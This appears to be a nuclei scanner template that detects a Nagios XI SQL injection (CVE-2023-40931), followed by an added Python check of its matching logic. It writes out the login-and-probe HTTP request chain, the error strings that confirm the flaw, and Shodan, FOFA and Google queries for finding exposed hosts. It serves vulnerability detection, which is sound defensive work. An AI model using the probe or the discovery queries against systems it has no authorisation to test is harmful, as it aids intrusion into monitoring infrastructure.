nuclei-templates/http/cves/2023/CVE-2023-40931.yaml

id: CVE-2023-40931

info:
  name: Nagios XI v5.11.0 - SQL Injection
  author: ritikchaddha
  severity: medium
  description: |
    A SQL injection vulnerability in Nagios XI from version 5.11.0 up to and including 5.11.1 allows authenticated attackers to execute arbitrary SQL commands via the ID parameter in the POST request to /nagiosxi/admin/banner_message-ajaxhelper.php.
  impact: |
    Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary SQL commands.
  remediation: |
    Upgrade Nagios XI to a patched version or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://rootsecdev.medium.com/notes-from-the-field-exploiting-nagios-xi-sql-injection-cve-2023-40931-9d5dd6563f8c
    - https://nvd.nist.gov/vuln/detail/CVE-2023-40931
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-40931
    cwe-id: CWE-89
    epss-score: 0.00208
    epss-percentile: 0.59103
    cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: nagios
    product: nagios_xi
    shodan-query: title:"Nagios XI"
    fofa-query: app="nagios-xi"
    google-query: intitle:"nagios xi"
  tags: cve2023,cve,authenticated,nagiosxi,sqli,nagios

http:
  - raw:
      # Request 1: fetch the login form; the nsp token is pulled from it by the extractor below.
      - |
        GET /nagiosxi/login.php HTTP/1.1
        Host: {{Hostname}}

      # Request 2: authenticate with the nsp token and the credentials supplied as template variables.
      - |
        POST /nagiosxi/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        nsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}

      # Request 3: the authenticated call whose response the matchers below inspect.
      - |
        POST /nagiosxi/admin/banner_message-ajaxhelper.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=acknowledge_banner_message&id=*

    # Both matchers must hit: all three database-error strings in the body AND an HTTP 200.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Failed to acknowledge"
          - "SQL Error"
          - "right syntax to use near"
        condition: and

      - type: status
        status:
          - 200

    # Internal extractor: captures the nsp form token from request 1 for reuse in request 2.
    extractors:
      - type: regex
        name: nsp
        part: body
        group: 1
        regex:
          - "name=['\"]nsp['\"] value=['\"](.*)['\"]>"
        internal: true
# digest: 4b0a00483046022100f4be15bd2937867e45851b9dee6d23d4dfc954501b41e1c5a32f3277d4f4aa3202210094e09fe16f5f1d6b02774f903b53f67d5ae150e0235c281c811a12330e1f8725:922c64590222798bb761d5b6d8e72950
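How the template above decides a hit, as an added Python example (my code, not part of the nuclei-templates project): it replays the word/status matcher logic and the nsp extractor over constructed sample responses, and shows that the greedy `(.*)` in the extractor over-captures when another quoted attribute follows on the same line. The `NSP_REGEX_STRICT` variant is my suggestion, not something the template ships.

```python
import re

# Matcher and extractor definitions copied from the template above.
WORDS = ["Failed to acknowledge", "SQL Error", "right syntax to use near"]
NSP_REGEX = re.compile(r"name=['\"]nsp['\"] value=['\"](.*)['\"]>")
# Suggested tightened variant (not from the template): stop at the first closing quote.
NSP_REGEX_STRICT = re.compile(r"name=['\"]nsp['\"] value=['\"]([^'\"]*)['\"]>")


def extract_nsp(login_page, pattern=NSP_REGEX):
    """Extractor semantics: first match of the pattern, capture group 1 (template: group: 1)."""
    match = pattern.search(login_page)
    return match.group(1) if match else None


def template_matches(status, body):
    """Request-3 verdict: every word present (condition: and) AND status 200
    (matchers-condition: and). A plain 'Failed to acknowledge' without the
    database error strings does not match, so an ordinary functional failure
    is not reported as the CVE."""
    words_ok = all(word in body for word in WORDS)
    return words_ok and status == 200


# Constructed sample responses; not real Nagios XI output.
LOGIN_PAGE_ONE_LINE = ('<input type="hidden" name="nsp" value="tok3n"><input type="hidden" '
                       'name="next" value="/nagiosxi/">')
LOGIN_PAGE_TWO_LINES = ('<input type="hidden" name="nsp" value="tok3n">\n'
                        '<input type="hidden" name="next" value="/nagiosxi/">')
SQL_ERROR_BODY = ("Failed to acknowledge banner message. SQL Error: You have an error in your "
                  "SQL syntax; check the manual that corresponds to your MySQL server version "
                  "for the right syntax to use near ''' at line 1")
BENIGN_FAILURE_BODY = "Failed to acknowledge banner message: message does not exist"

if __name__ == "__main__":
    print("nsp, template regex, attributes on one line :", extract_nsp(LOGIN_PAGE_ONE_LINE))
    print("nsp, template regex, attributes on two lines:", extract_nsp(LOGIN_PAGE_TWO_LINES))
    print("nsp, strict regex, attributes on one line   :", extract_nsp(LOGIN_PAGE_ONE_LINE, NSP_REGEX_STRICT))
    print("SQL error body matches    :", template_matches(200, SQL_ERROR_BODY))
    print("benign failure body matches:", template_matches(200, BENIGN_FAILURE_BODY))
```

Because `.` does not cross a newline in Python or Go regexps, the over-capture only bites when the login form puts several inputs on one line; the second request then carries a corrupted nsp value and the chain silently fails at login.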